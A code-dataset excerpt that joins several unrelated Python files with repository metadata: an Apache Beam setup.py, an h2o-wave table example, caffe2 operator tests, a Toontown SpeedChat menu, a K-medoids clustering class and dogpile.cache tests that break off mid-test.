"You are using version {0} of pip. " \
"However, version {1} is recommended.".format(
_PIP_VERSION, REQUIRED_PIP_VERSION
)
)
REQUIRED_CYTHON_VERSION = '0.28.1'
try:
_CYTHON_VERSION = get_distribution('cython').version
if StrictVersion(_CYTHON_VERSION) < StrictVersion(REQUIRED_CYTHON_VERSION):
warnings.warn(
"You are using version {0} of cython. " \
"However, version {1} is recommended.".format(
_CYTHON_VERSION, REQUIRED_CYTHON_VERSION
)
)
except DistributionNotFound:
# do nothing if Cython is not installed
pass
try:
# pylint: disable=wrong-import-position
from Cython.Build import cythonize
except ImportError:
cythonize = lambda *args, **kwargs: []
REQUIRED_PACKAGES = [
# Avro 1.9.2 for python3 was broken. The issue was fixed in version 1.9.2.1
'avro-python3>=1.8.1,!=1.9.2,<1.10.0',
'crcmod>=1.7,<2.0',
# dataclasses backport for python_version<3.7. No version bound because this
# is Python standard since Python 3.7 and each Python version is compatible
# with a specific dataclasses version.
'dataclasses;python_version<"3.7"',
# orjson, only available on Python 3.6 and above
'orjson<4.0;python_version>="3.6"',
# Dill doesn't have forwards-compatibility guarantees within minor version.
# Pickles created with a new version of dill may not unpickle using older
# version of dill. It is best to use the same version of dill on client and
# server, therefore list of allowed versions is very narrow.
# See: https://github.com/uqfoundation/dill/issues/341.
'dill>=0.3.1.1,<0.3.2',
'fastavro>=0.21.4,<2',
'future>=0.18.2,<1.0.0',
'grpcio>=1.29.0,<2',
'hdfs>=2.1.0,<3.0.0',
'httplib2>=0.8,<0.20.0',
'numpy>=1.14.3,<1.21.0',
'pymongo>=3.8.0,<4.0.0',
'oauth2client>=2.0.1,<5',
'protobuf>=3.12.2,<4',
'pyarrow>=0.15.1,<5.0.0',
'pydot>=1.2.0,<2',
'python-dateutil>=2.8.0,<3',
'pytz>=2018.3',
'requests>=2.24.0,<3.0.0',
'typing-extensions>=3.7.0,<4',
]
# [BEAM-8181] pyarrow cannot be installed on 32-bit Windows platforms.
if sys.platform == 'win32' and sys.maxsize <= 2**32:
REQUIRED_PACKAGES = [
p for p in REQUIRED_PACKAGES if not p.startswith('pyarrow')
]
REQUIRED_TEST_PACKAGES = [
'freezegun>=0.3.12',
'mock>=1.0.1,<3.0.0',
'pandas>=1.0,<1.3.0',
'parameterized>=0.7.1,<0.8.0',
'pyhamcrest>=1.9,!=1.10.0,<2.0.0',
'pyyaml>=3.12,<6.0.0',
'requests_mock>=1.7,<2.0',
'tenacity>=5.0.2,<6.0',
'pytest>=4.4.0,<5.0',
'pytest-xdist>=1.29.0,<2',
'pytest-timeout>=1.3.3,<2',
'sqlalchemy>=1.3,<2.0',
'psycopg2-binary>=2.8.5,<3.0.0',
'testcontainers>=3.0.3,<4.0.0',
]
GCP_REQUIREMENTS = [
'cachetools>=3.1.0,<5',
'google-apitools>=0.5.31,<0.5.32',
# NOTE: Maintainers, please do not require google-auth>=2.x.x
# Until this issue is closed
# https://github.com/googleapis/google-cloud-python/issues/10566
'google-auth>=1.18.0,<3',
'google-cloud-datastore>=1.8.0,<2',
'google-cloud-pubsub>=0.39.0,<2',
# GCP packages required by tests
'google-cloud-bigquery>=1.6.0,<3',
'google-cloud-core>=0.28.1,<2',
'google-cloud-bigtable>=0.31.1,<2',
'google-cloud-spanner>=1.13.0,<2',
'grpcio-gcp>=0.2.2,<1',
# GCP Packages required by ML functionality
'google-cloud-dlp>=0.12.0,<2',
'google-cloud-language>=1.3.0,<2',
'google-cloud-videointelligence>=1.8.0,<2',
'google-cloud-vision>=0.38.0,<2',
'google-cloud-recommendations-ai>=0.1.0,<=0.2.0'
]
INTERACTIVE_BEAM = [
'facets-overview>=1.0.0,<2',
'ipython>=7,<8',
'ipykernel>=5.2.0,<6',
# Skip version 6.1.13 due to
# https://github.com/jupyter/jupyter_client/issues/637
'jupyter-client>=6.1.11,<6.1.13',
'timeloop>=1.0.2,<2',
]
INTERACTIVE_BEAM_TEST = [
    # notebook utils
'nbformat>=5.0.5,<6',
'nbconvert>=6.2.0,<7',
# headless chrome based integration tests
'selenium>=3.141.0,<4',
'needle>=0.5.0,<1',
'chromedriver-binary>=93,<94',
# use a fixed major version of PIL for different python versions
'pillow>=7.1.1,<8',
]
AWS_REQUIREMENTS = ['boto3 >=1.9']
AZURE_REQUIREMENTS = [
'azure-storage-blob >=12.3.2',
'azure-core >=1.7.0',
]
# We must generate protos after setup_requires are installed.
def generate_protos_first(original_cmd):
try:
# See https://issues.apache.org/jira/browse/BEAM-2366
# pylint: disable=wrong-import-position
import gen_protos
class cmd(original_cmd, object):
def run(self):
gen_protos.generate_proto_files()
super(cmd, self).run()
return cmd
except ImportError:
warnings.warn("Could not import gen_protos, skipping proto generation.")
return original_cmd
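# The wrapper is applied in cmdclass below, e.g. 'build_py':
# generate_protos_first(build_py), so the portability protos are regenerated
# before each wrapped command runs.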
python_requires = '>=3.6'
if sys.version_info.major == 3 and sys.version_info.minor >= 9:
warnings.warn(
'This version of Apache Beam has not been sufficiently tested on '
'Python %s.%s. You may encounter bugs or missing features.' %
(sys.version_info.major, sys.version_info.minor))
setuptools.setup(
name=PACKAGE_NAME,
version=PACKAGE_VERSION,
description=PACKAGE_DESCRIPTION,
long_description=PACKAGE_LONG_DESCRIPTION,
url=PACKAGE_URL,
download_url=PACKAGE_DOWNLOAD_URL,
author=PACKAGE_AUTHOR,
author_email=PACKAGE_EMAIL,
packages=setuptools.find_packages(),
package_data={
'apache_beam': [
'*/*.pyx',
'*/*/*.pyx',
'*/*.pxd',
'*/*/*.pxd',
'*/*.h',
'*/*/*.h',
'testing/data/*.yaml',
'portability/api/*.yaml'
]
},
ext_modules=cythonize([
# Make sure to use language_level=3 cython directive in files below.
'apache_beam/**/*.pyx',
'apache_beam/coders/coder_impl.py',
'apache_beam/metrics/cells.py',
'apache_beam/metrics/execution.py',
'apache_beam/runners/common.py',
'apache_beam/runners/worker/logger.py',
'apache_beam/runners/worker/opcounters.py',
'apache_beam/runners/worker/operations.py',
'apache_beam/transforms/cy_combiners.py',
'apache_beam/transforms/stats.py',
'apache_beam/utils/counters.py',
'apache_beam/utils/windowed_value.py',
]),
install_requires=REQUIRED_PACKAGES,
python_requires=python_requires,
# BEAM-8840: Do NOT use tests_require or setup_requires.
extras_require={
'docs': ['Sphinx>=1.5.2,<2.0'],
'test': REQUIRED_TEST_PACKAGES,
'gcp': GCP_REQUIREMENTS,
'interactive': INTERACTIVE_BEAM,
'interactive_test': INTERACTIVE_BEAM_TEST,
'aws': AWS_REQUIREMENTS,
'azure': AZURE_REQUIREMENTS
},
zip_safe=False,
# PyPI package information.
classifiers=[
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
        # When updating version classifiers, also update version warnings
# above and in apache_beam/__init__.py.
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
],
license='Apache License, Version 2.0',
keywords=PACKAGE_KEYWORDS,
cmdclass={
'build_py': generate_protos_first(build_py),
'develop': generate_protos_first(develop),
'egg_info': generate_protos_first(egg_info),
'test': generate_protos_first(test),
'mypy': generate_protos_first(mypy),
},
)
| 33.122754 | 80 | 0.670975 |
81abd9447837a736af19063458b954ed2b49e934 | 1,795 | py | Python | py/examples/table_download.py | angelosaleh/wave | 06f5601e13c23e021429dbdb9f6140ddfed27644 | [
"Apache-2.0"
] | 1 | 2021-01-02T04:47:28.000Z | 2021-01-02T04:47:28.000Z | py/examples/table_download.py | MaxCodeXTC/wave | b16bcd99b9752aae93aacf84d5c160093d775131 | [
"Apache-2.0"
] | null | null | null | py/examples/table_download.py | MaxCodeXTC/wave | b16bcd99b9752aae93aacf84d5c160093d775131 | [
"Apache-2.0"
] | 1 | 2021-02-01T05:07:56.000Z | 2021-02-01T05:07:56.000Z | # Table / Download
# Allow downloading a table's data as CSV file.
# #table #download
# ---
import random
from faker import Faker
from h2o_wave import main, app, Q, ui
fake = Faker()
_id = 0
class Issue:
def __init__(self, text: str, status: str, progress: float, icon: str, notifications: str):
global _id
_id += 1
self.id = f'I{_id}'
self.text = text
self.status = status
self.views = 0
self.progress = progress
self.icon = icon
self.notifications = notifications
# Create some issues
issues = [
Issue(
text=fake.sentence(),
status=('Closed' if i % 2 == 0 else 'Open'),
progress=random.random(),
icon=('BoxCheckmarkSolid' if random.random() > 0.5 else 'BoxMultiplySolid'),
notifications=('Off' if random.random() > 0.5 else 'On')) for i in range(100)
]
# Create columns for our issue table.
columns = [
ui.table_column(name='text', label='Issue'),
ui.table_column(name='status', label='Status'),
ui.table_column(name='notifications', label='Notifications'),
ui.table_column(name='done', label='Done', cell_type=ui.icon_table_cell_type()),
ui.table_column(name='views', label='Views'),
ui.table_column(name='progress', label='Progress', cell_type=ui.progress_table_cell_type()),
]
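# downloadable=True on the table below adds a download control that exports
# the table's rows as a CSV file, which is the behavior this example shows.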
@app('/demo')
async def serve(q: Q):
q.page['form'] = ui.form_card(box='1 1 -1 11', items=[
ui.table(
name='issues',
columns=columns,
rows=[ui.table_row(
name=issue.id,
cells=[issue.text, issue.status, issue.notifications, issue.icon, str(issue.views), issue.progress]) for
issue in issues],
downloadable=True,
)
])
await q.page.save()
| 28.951613 | 120 | 0.607242 |
375068ef537e3074e807ef6eab51eaadddba56dc | 6,710 | py | Python | caffe2/python/sparse_to_dense_mask_test.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
] | 40 | 2021-06-01T07:37:59.000Z | 2022-03-25T01:42:09.000Z | caffe2/python/sparse_to_dense_mask_test.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
] | 14 | 2021-06-01T11:52:46.000Z | 2022-03-25T02:13:08.000Z | caffe2/python/sparse_to_dense_mask_test.py | wenhaopeter/read_pytorch_code | 491f989cd918cf08874dd4f671fb7f0142a0bc4f | [
"Intel",
"X11"
] | 7 | 2021-07-20T19:34:26.000Z | 2022-03-13T21:07:36.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import core, workspace
from caffe2.python.test_util import TestCase
import numpy as np
class TestSparseToDenseMask(TestCase):
def test_sparse_to_dense_mask_float(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default', 'lengths'],
['output'],
mask=[999999999, 2, 6])
workspace.FeedBlob(
'indices',
np.array([2, 4, 6, 1, 2, 999999999, 2], dtype=np.int32))
workspace.FeedBlob(
'values',
np.array([1, 2, 3, 4, 5, 6, 7], dtype=np.float))
workspace.FeedBlob('default', np.array(-1, dtype=np.float))
workspace.FeedBlob('lengths', np.array([3, 4], dtype=np.int32))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
expected = np.array([[-1, 1, 3], [6, 7, -1]], dtype=np.float)
self.assertEqual(output.shape, expected.shape)
np.testing.assert_array_equal(output, expected)
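        # Walkthrough of `expected` above: the mask [999999999, 2, 6] fixes the
        # dense column order. Row 0 consumes the first 3 (index, value) pairs:
        # 2->1 and 6->3 fill columns 1 and 2, index 4 is not in the mask so its
        # value is dropped, and column 0 keeps the default -1. Row 1 consumes
        # the next 4 pairs: 1->4 is dropped, 2->5 is overwritten by the later
        # 2->7, and 999999999->6 fills column 0, giving [6, 7, -1].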
def test_sparse_to_dense_mask_invalid_inputs(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default', 'lengths'],
['output'],
mask=[999999999, 2],
max_skipped_indices=3)
workspace.FeedBlob(
'indices',
np.array([2000000000000, 999999999, 2, 3, 4, 5], dtype=np.int32))
workspace.FeedBlob(
'values',
np.array([1, 2, 3, 4, 5, 6], dtype=np.float))
workspace.FeedBlob('default', np.array(-1, dtype=np.float))
workspace.FeedBlob('lengths', np.array([6], dtype=np.int32))
try:
workspace.RunOperatorOnce(op)
except RuntimeError:
self.fail("Exception raised with only one negative index")
# 3 invalid inputs should throw.
workspace.FeedBlob(
'indices',
np.array([-1, 1, 2, 3, 4, 5], dtype=np.int32))
with self.assertRaises(RuntimeError):
workspace.RunOperatorMultiple(op, 3)
def test_sparse_to_dense_mask_subtensor(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default', 'lengths'],
['output'],
mask=[999999999, 2, 888, 6])
workspace.FeedBlob(
'indices',
np.array([2, 4, 6, 999999999, 2], dtype=np.int64))
workspace.FeedBlob(
'values',
np.array([[[1, -1]], [[2, -2]], [[3, -3]], [[4, -4]], [[5, -5]]],
dtype=np.float))
workspace.FeedBlob('default', np.array([[-1, 0]], dtype=np.float))
workspace.FeedBlob('lengths', np.array([2, 3], dtype=np.int32))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
expected = np.array([
[[[-1, 0]], [[1, -1]], [[-1, 0]], [[-1, 0]]],
[[[4, -4]], [[5, -5]], [[-1, 0]], [[3, -3]]]], dtype=np.float)
self.assertEqual(output.shape, expected.shape)
np.testing.assert_array_equal(output, expected)
def test_sparse_to_dense_mask_string(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default', 'lengths'],
['output'],
mask=[999999999, 2, 6])
workspace.FeedBlob(
'indices',
np.array([2, 4, 6, 1, 2, 999999999, 2], dtype=np.int32))
workspace.FeedBlob(
'values',
np.array(['1', '2', '3', '4', '5', '6', '7'], dtype='S'))
workspace.FeedBlob('default', np.array('-1', dtype='S'))
workspace.FeedBlob('lengths', np.array([3, 4], dtype=np.int32))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
expected =\
np.array([['-1', '1', '3'], ['6', '7', '-1']], dtype='S')
self.assertEqual(output.shape, expected.shape)
np.testing.assert_array_equal(output, expected)
def test_sparse_to_dense_mask_empty_lengths(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default'],
['output'],
mask=[1, 2, 6])
workspace.FeedBlob('indices', np.array([2, 4, 6], dtype=np.int32))
workspace.FeedBlob('values', np.array([1, 2, 3], dtype=np.float))
workspace.FeedBlob('default', np.array(-1, dtype=np.float))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
expected = np.array([-1, 1, 3], dtype=np.float)
self.assertEqual(output.shape, expected.shape)
np.testing.assert_array_equal(output, expected)
def test_sparse_to_dense_mask_no_lengths(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default'],
['output'],
mask=[1, 2, 6])
workspace.FeedBlob('indices', np.array([2, 4, 6], dtype=np.int32))
workspace.FeedBlob('values', np.array([1, 2, 3], dtype=np.float))
workspace.FeedBlob('default', np.array(-1, dtype=np.float))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
expected = np.array([-1, 1, 3], dtype=np.float)
self.assertEqual(output.shape, expected.shape)
np.testing.assert_array_equal(output, expected)
def test_sparse_to_dense_mask_presence_mask(self):
op = core.CreateOperator(
'SparseToDenseMask',
['indices', 'values', 'default', 'lengths'],
['output', 'presence_mask'],
mask=[11, 12],
return_presence_mask=True)
workspace.FeedBlob('indices', np.array([11, 12, 13], dtype=np.int32))
workspace.FeedBlob('values', np.array([11, 12, 13], dtype=np.float))
workspace.FeedBlob('default', np.array(-1, dtype=np.float))
workspace.FeedBlob('lengths', np.array([1, 2], dtype=np.int32))
workspace.RunOperatorOnce(op)
output = workspace.FetchBlob('output')
presence_mask = workspace.FetchBlob('presence_mask')
expected_output = np.array([[11, -1], [-1, 12]], dtype=np.float)
expected_presence_mask = np.array(
[[True, False], [False, True]],
dtype=np.bool)
self.assertEqual(output.shape, expected_output.shape)
np.testing.assert_array_equal(output, expected_output)
self.assertEqual(presence_mask.shape, expected_presence_mask.shape)
np.testing.assert_array_equal(presence_mask, expected_presence_mask)
| 42.468354 | 77 | 0.581371 |
e502132afad2126337227688ca11b3751a48a78e | 2,035 | py | Python | v2.5.7/toontown/speedchat/TTSCWinterMenu.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 4 | 2019-07-01T15:46:43.000Z | 2021-07-23T16:26:48.000Z | v2.5.7/toontown/speedchat/TTSCWinterMenu.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 1 | 2019-06-29T03:40:05.000Z | 2021-06-13T01:15:16.000Z | v2.5.7/toontown/speedchat/TTSCWinterMenu.py | TTOFFLINE-LEAK/ttoffline | bb0e91704a755d34983e94288d50288e46b68380 | [
"MIT"
] | 4 | 2019-07-28T21:18:46.000Z | 2021-02-25T06:37:25.000Z | from otp.otpbase import PythonUtil
from otp.speedchat.SCMenu import SCMenu
from otp.speedchat.SCMenuHolder import SCMenuHolder
from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal
from toontown.speedchat.TTSCIndexedTerminal import TTSCIndexedTerminal
from otp.otpbase import OTPLocalizer
WinterMenu = [
(
OTPLocalizer.WinterMenuSections[0],
{30200: 30220, 30201: 30221,
30202: 30222,
30203: 30223,
30204: 30224,
30205: 30225}), (OTPLocalizer.WinterMenuSections[1], [30275, 30276, 30277])]
class TTSCWinterMenu(SCMenu):
def __init__(self, carol):
SCMenu.__init__(self)
self.__messagesChanged(carol)
def destroy(self):
SCMenu.destroy(self)
def clearMenu(self):
SCMenu.clearMenu(self)
def __messagesChanged(self, carol):
self.clearMenu()
try:
lt = base.localAvatar
except:
return
winterMenu = []
if carol:
winterMenu.append(WinterMenu[0])
winterMenu.append(WinterMenu[1])
for section in winterMenu:
if section[0] == -1:
for phrase in section[1]:
if phrase not in OTPLocalizer.SpeedChatStaticText:
print 'warning: tried to link Winter phrase %s which does not seem to exist' % phrase
break
self.append(SCStaticTextTerminal(phrase))
else:
menu = SCMenu()
for phrase in section[1].keys():
blatherTxt = section[1][phrase]
if blatherTxt not in OTPLocalizer.SpeedChatStaticText:
print 'warning: tried to link Winter phrase %s which does not seem to exist' % phrase
break
menu.append(TTSCIndexedTerminal(OTPLocalizer.SpeedChatStaticText.get(phrase, None), blatherTxt))
menuName = str(section[0])
self.append(SCMenuHolder(menuName, menu))
return | 34.491525 | 116 | 0.608845 |
5a1145df58acfce07b22110993cc707f5ae62207 | 6,446 | py | Python | sd/algorithms/extra/kmedoids.py | shibaji7/SuperDARN-Clustering | d7427ba609fb7f5e50c26f52364e5e9e118bbc31 | [
"Apache-2.0"
] | 1 | 2020-12-02T20:13:34.000Z | 2020-12-02T20:13:34.000Z | sd/algorithms/extra/kmedoids.py | shibaji7/SuperDARN-Clustering | d7427ba609fb7f5e50c26f52364e5e9e118bbc31 | [
"Apache-2.0"
] | null | null | null | sd/algorithms/extra/kmedoids.py | shibaji7/SuperDARN-Clustering | d7427ba609fb7f5e50c26f52364e5e9e118bbc31 | [
"Apache-2.0"
] | null | null | null | from scipy.sparse import csr_matrix
import numpy as np
import random
class KMedoids:
def __init__(self, n_clusters=2, max_iter=10, tol=0.1, start_prob=0.8, end_prob=0.99):
"""Kmedoids constructor called"""
if start_prob < 0 or start_prob >= 1 or end_prob < 0 or end_prob >= 1 or start_prob > end_prob:
raise ValueError("Invalid input")
self.n_clusters = n_clusters
self.max_iter = max_iter
self.tol = tol
self.start_prob = start_prob
self.end_prob = end_prob
self.medoids = []
self.clusters = {}
self.tol_reached = float("inf")
self.current_distance = 0
self.__data = None
self.__is_csr = None
self.__rows = 0
self.__columns = 0
self.cluster_distances = {}
def fit(self, data):
self.__data = csr_matrix(data)
self.__set_data_type()
self.__start_algo()
return self
def __update_labels(self):
        # Build a per-row label array from the final clusters; the original
        # body only printed debug output and left the label list empty.
        labels = np.empty(self.__rows, dtype=int)
        for cluster_idx, medoid in enumerate(self.medoids):
            for row in self.clusters[medoid]:
                labels[row] = cluster_idx
        self.labels = labels
return
def __start_algo(self):
self.__initialize_medoids()
self.clusters, self.cluster_distances = self.__calculate_clusters(self.medoids)
self.__update_clusters()
self.__update_labels()
def __update_clusters(self):
for i in range(self.max_iter):
cluster_dist_with_new_medoids = self.__swap_and_recalculate_clusters()
if self.__is_new_cluster_dist_small(cluster_dist_with_new_medoids) == True:
self.clusters, self.cluster_distances = self.__calculate_clusters(self.medoids)
else:
break
def __is_new_cluster_dist_small(self, cluster_dist_with_new_medoids):
existance_dist = self.calculate_distance_of_clusters()
new_dist = self.calculate_distance_of_clusters(cluster_dist_with_new_medoids)
if existance_dist > new_dist and (existance_dist - new_dist) > self.tol:
self.medoids = cluster_dist_with_new_medoids.keys()
return True
return False
def calculate_distance_of_clusters(self, cluster_dist=None):
if cluster_dist == None:
cluster_dist = self.cluster_distances
dist = 0
for medoid in cluster_dist.keys():
dist += cluster_dist[medoid]
return dist
def __swap_and_recalculate_clusters(self):
# http://www.math.le.ac.uk/people/ag153/homepage/KmeansKmedoids/Kmeans_Kmedoids.html
cluster_dist = {}
for medoid in self.medoids:
is_shortest_medoid_found = False
for data_index in self.clusters[medoid]:
if data_index != medoid:
cluster_list = list(self.clusters[medoid])
cluster_list[self.clusters[medoid].index(data_index)] = medoid
new_distance = self.calculate_inter_cluster_distance(data_index, cluster_list)
if new_distance < self.cluster_distances[medoid]:
cluster_dist[data_index] = new_distance
is_shortest_medoid_found = True
break
if is_shortest_medoid_found == False:
cluster_dist[medoid] = self.cluster_distances[medoid]
return cluster_dist
def calculate_inter_cluster_distance(self, medoid, cluster_list):
distance = 0
for data_index in cluster_list:
distance += self.__get_distance(medoid, data_index)
return distance/len(cluster_list)
def __calculate_clusters(self, medoids):
clusters = {}
cluster_distances = {}
for medoid in medoids:
clusters[medoid] = []
cluster_distances[medoid] = 0
for row in range(self.__rows):
            nearest_medoid, nearest_distance = self.__get_shortest_distance_to_medoid(row, medoids)
cluster_distances[nearest_medoid] += nearest_distance
clusters[nearest_medoid].append(row)
for medoid in medoids:
cluster_distances[medoid] /= len(clusters[medoid])
return clusters, cluster_distances
    def __get_shortest_distance_to_medoid(self, row_index, medoids):
min_distance = float("inf")
current_medoid = None
for medoid in medoids:
current_distance = self.__get_distance(medoid, row_index)
if current_distance < min_distance:
min_distance = current_distance
current_medoid = medoid
return current_medoid, min_distance
def __initialize_medoids(self):
"""Kmeans++ initialisation"""
self.medoids.append(random.randint(0,self.__rows-1))
while len(self.medoids) != self.n_clusters:
self.medoids.append(self.__find_distant_medoid())
def __find_distant_medoid(self):
distances = []
indices = []
for row in range(self.__rows):
indices.append(row)
            distances.append(self.__get_shortest_distance_to_medoid(row, self.medoids)[1])
distances_index = np.argsort(distances)
choosen_dist = self.__select_distant_medoid(distances_index)
return indices[choosen_dist]
def __select_distant_medoid(self, distances_index):
start_index = round(self.start_prob*len(distances_index))
end_index = round(self.end_prob*(len(distances_index)-1))
return distances_index[random.randint(start_index, end_index)]
def __get_distance(self, x1, x2):
a = self.__data[x1].toarray() if self.__is_csr == True else np.array(self.__data[x1])
b = self.__data[x2].toarray() if self.__is_csr == True else np.array(self.__data[x2])
return np.linalg.norm(a-b)
def __set_data_type(self):
"""to check whether the given input is of type "list" or "csr" """
if isinstance(self.__data,csr_matrix):
self.__is_csr = True
self.__rows = self.__data.shape[0]
self.__columns = self.__data.shape[1]
elif isinstance(self.__data,list):
self.__is_csr = False
self.__rows = len(self.__data)
self.__columns = len(self.__data[0])
else:
raise ValueError("Invalid input")
| 39.790123 | 103 | 0.624263 |
b49076b62fad277962af24bb0d2f20cfbe32cabf | 26,967 | py | Python | tests/cache/test_region.py | shanesaravia/dogpile.cache | 21a8248bb7a20863a0267e0069225fb416e73ca9 | [
"BSD-3-Clause"
] | null | null | null | tests/cache/test_region.py | shanesaravia/dogpile.cache | 21a8248bb7a20863a0267e0069225fb416e73ca9 | [
"BSD-3-Clause"
] | null | null | null | tests/cache/test_region.py | shanesaravia/dogpile.cache | 21a8248bb7a20863a0267e0069225fb416e73ca9 | [
"BSD-3-Clause"
] | null | null | null | from collections import defaultdict
import datetime
import itertools
import time
from unittest import TestCase
import mock
from dogpile.cache import CacheRegion
from dogpile.cache import exception
from dogpile.cache import make_region
from dogpile.cache.api import CacheBackend
from dogpile.cache.api import CachedValue
from dogpile.cache.api import NO_VALUE
from dogpile.cache.proxy import ProxyBackend
from dogpile.cache.region import _backend_loader
from dogpile.cache.region import RegionInvalidationStrategy
from dogpile.util import compat
from . import assert_raises_message
from . import configparser
from . import eq_
from . import io
from . import is_
from ._fixtures import MockBackend
def key_mangler(key):
return "HI!" + key
class APITest(TestCase):
def test_no_value_str(self):
eq_(str(NO_VALUE), "<dogpile.cache.api.NoValue object>")
class RegionTest(TestCase):
def _region(self, init_args={}, config_args={}, backend="mock"):
reg = CacheRegion(**init_args)
reg.configure(backend, **config_args)
return reg
def test_set_name(self):
my_region = make_region(name="my-name")
eq_(my_region.name, "my-name")
def test_instance_from_dict(self):
my_conf = {
"cache.example.backend": "mock",
"cache.example.expiration_time": 600,
"cache.example.arguments.url": "127.0.0.1",
}
my_region = make_region()
my_region.configure_from_config(my_conf, "cache.example.")
eq_(my_region.expiration_time, 600)
assert isinstance(my_region.backend, MockBackend) is True
eq_(my_region.backend.arguments, {"url": "127.0.0.1"})
def test_instance_from_config_string(self):
my_conf = (
"[xyz]\n"
"cache.example.backend=mock\n"
"cache.example.expiration_time=600\n"
"cache.example.arguments.url=127.0.0.1\n"
"cache.example.arguments.dogpile_lockfile=false\n"
"cache.example.arguments.xyz=None\n"
)
my_region = make_region()
config = configparser.ConfigParser()
compat.read_config_file(config, io.StringIO(my_conf))
my_region.configure_from_config(
dict(config.items("xyz")), "cache.example."
)
eq_(my_region.expiration_time, 600)
assert isinstance(my_region.backend, MockBackend) is True
eq_(
my_region.backend.arguments,
{"url": "127.0.0.1", "dogpile_lockfile": False, "xyz": None},
)
def test_datetime_expiration_time(self):
my_region = make_region()
my_region.configure(
backend="mock", expiration_time=datetime.timedelta(days=1, hours=8)
)
eq_(my_region.expiration_time, 32 * 60 * 60)
def test_reject_invalid_expiration_time(self):
my_region = make_region()
assert_raises_message(
exception.ValidationError,
"expiration_time is not a number or timedelta.",
my_region.configure,
"mock",
"one hour",
)
def test_key_mangler_argument(self):
reg = self._region(init_args={"key_mangler": key_mangler})
assert reg.key_mangler is key_mangler
reg = self._region()
assert reg.key_mangler is None
MockBackend.key_mangler = lambda self, k: "foo"
reg = self._region()
eq_(reg.key_mangler("bar"), "foo")
MockBackend.key_mangler = None
def test_key_mangler_impl(self):
reg = self._region(init_args={"key_mangler": key_mangler})
reg.set("some key", "some value")
eq_(list(reg.backend._cache), ["HI!some key"])
eq_(reg.get("some key"), "some value")
eq_(
reg.get_or_create("some key", lambda: "some new value"),
"some value",
)
reg.delete("some key")
eq_(reg.get("some key"), NO_VALUE)
def test_dupe_config(self):
reg = CacheRegion()
reg.configure("mock")
assert_raises_message(
exception.RegionAlreadyConfigured,
"This region is already configured",
reg.configure,
"mock",
)
eq_(reg.is_configured, True)
def test_replace_backend_config(self):
reg = CacheRegion()
reg.configure("dogpile.cache.null")
eq_(reg.is_configured, True)
null_backend = _backend_loader.load("dogpile.cache.null")
assert reg.key_mangler is null_backend.key_mangler
reg.configure("mock", replace_existing_backend=True)
eq_(reg.is_configured, True)
assert isinstance(reg.backend, MockBackend)
assert reg.key_mangler is MockBackend.key_mangler
def test_replace_backend_config_with_custom_key_mangler(self):
reg = CacheRegion(key_mangler=key_mangler)
reg.configure("dogpile.cache.null")
eq_(reg.is_configured, True)
assert reg.key_mangler is key_mangler
reg.configure("mock", replace_existing_backend=True)
eq_(reg.is_configured, True)
assert reg.key_mangler is key_mangler
def test_no_config(self):
reg = CacheRegion()
assert_raises_message(
exception.RegionNotConfigured,
"No backend is configured on this region.",
getattr,
reg,
"backend",
)
eq_(reg.is_configured, False)
def test_invalid_backend(self):
reg = CacheRegion()
assert_raises_message(
exception.PluginNotFound,
"Couldn't find cache plugin to load: unknown",
reg.configure,
"unknown",
)
eq_(reg.is_configured, False)
def test_set_get_value(self):
reg = self._region()
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
def test_set_get_nothing(self):
reg = self._region()
eq_(reg.get("some key"), NO_VALUE)
eq_(reg.get("some key", expiration_time=10), NO_VALUE)
reg.invalidate()
eq_(reg.get("some key"), NO_VALUE)
def test_creator(self):
reg = self._region()
def creator():
return "some value"
eq_(reg.get_or_create("some key", creator), "some value")
def test_multi_creator(self):
reg = self._region()
def creator(*keys):
return ["some value %s" % key for key in keys]
eq_(
reg.get_or_create_multi(["k3", "k2", "k5"], creator),
["some value k3", "some value k2", "some value k5"],
)
def test_remove(self):
reg = self._region()
reg.set("some key", "some value")
reg.delete("some key")
reg.delete("some key")
eq_(reg.get("some key"), NO_VALUE)
def test_expire(self):
reg = self._region(config_args={"expiration_time": 1})
counter = itertools.count(1)
def creator():
return "some value %d" % next(counter)
eq_(reg.get_or_create("some key", creator), "some value 1")
time.sleep(2)
is_(reg.get("some key"), NO_VALUE)
eq_(reg.get("some key", ignore_expiration=True), "some value 1")
eq_(
reg.get_or_create("some key", creator, expiration_time=-1),
"some value 1",
)
eq_(reg.get_or_create("some key", creator), "some value 2")
eq_(reg.get("some key"), "some value 2")
def test_expire_multi(self):
reg = self._region(config_args={"expiration_time": 1})
counter = itertools.count(1)
def creator(*keys):
return ["some value %s %d" % (key, next(counter)) for key in keys]
eq_(
reg.get_or_create_multi(["k3", "k2", "k5"], creator),
["some value k3 2", "some value k2 1", "some value k5 3"],
)
time.sleep(2)
is_(reg.get("k2"), NO_VALUE)
eq_(reg.get("k2", ignore_expiration=True), "some value k2 1")
eq_(
reg.get_or_create_multi(["k3", "k2"], creator, expiration_time=-1),
["some value k3 2", "some value k2 1"],
)
eq_(
